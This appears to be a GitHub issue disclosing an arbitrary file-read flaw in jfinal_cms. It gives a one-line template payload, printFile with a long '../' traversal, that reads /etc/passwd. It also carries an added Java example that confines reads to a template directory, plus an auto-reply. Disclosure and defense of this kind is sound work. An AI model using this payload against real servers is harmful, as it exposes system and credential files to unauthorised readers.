Arbitrary file reading vulnerability exists
hacker-mao opened this issue · 1 comment
hacker-mao commented
Enter the background, edit /template/includes/jquery.html in the template management. The PoC is as follows:
${printFile('../../../../../../../../../../../../../../../etc/passwd')}
Reopen the homepage http://localhost:8877/jfinal_cms/ and you can see /etc/passwd.
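A defensive counterpart to the report above, as an added example (not jfinal_cms code and not part of the issue): a file-read helper that rejects any path resolving outside a fixed template directory. The class name `ConfinedFileReader` and the temporary directory used as the template root are assumptions; the page does not show how the project's `printFile` is implemented.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

// Hypothetical helper, not jfinal_cms code: confines template file reads to one base directory.
public class ConfinedFileReader {
    private final Path base;

    public ConfinedFileReader(Path baseDir) throws IOException {
        // Resolve symlinks once so later prefix checks compare real paths.
        this.base = baseDir.toRealPath();
    }

    public String read(String requested) throws IOException {
        // normalize() collapses "../" segments before the containment check;
        // an absolute 'requested' replaces base entirely and fails the check too.
        Path candidate = base.resolve(requested).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes template directory: " + requested);
        }
        // toRealPath() follows symlinks; re-check so a link inside base cannot point outside.
        Path real = candidate.toRealPath();
        if (!real.startsWith(base)) {
            throw new SecurityException("symlink escapes template directory: " + requested);
        }
        return new String(Files.readAllBytes(real), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a temporary directory standing in for the template root.
        Path root = Files.createTempDirectory("templates");
        Files.createDirectories(root.resolve("includes"));
        Files.write(root.resolve("includes/jquery.html"),
                "<script></script>".getBytes(StandardCharsets.UTF_8));
        ConfinedFileReader reader = new ConfinedFileReader(root);

        System.out.println("allowed: " + reader.read("includes/jquery.html"));
        try {
            reader.read("../../../../../../../../../../../../../../../etc/passwd");
            System.out.println("NOT BLOCKED");
        } catch (SecurityException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```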
ElevenKong commented
Hello, I have received your message! Thank you!
Best Wishes!
——孔祥亮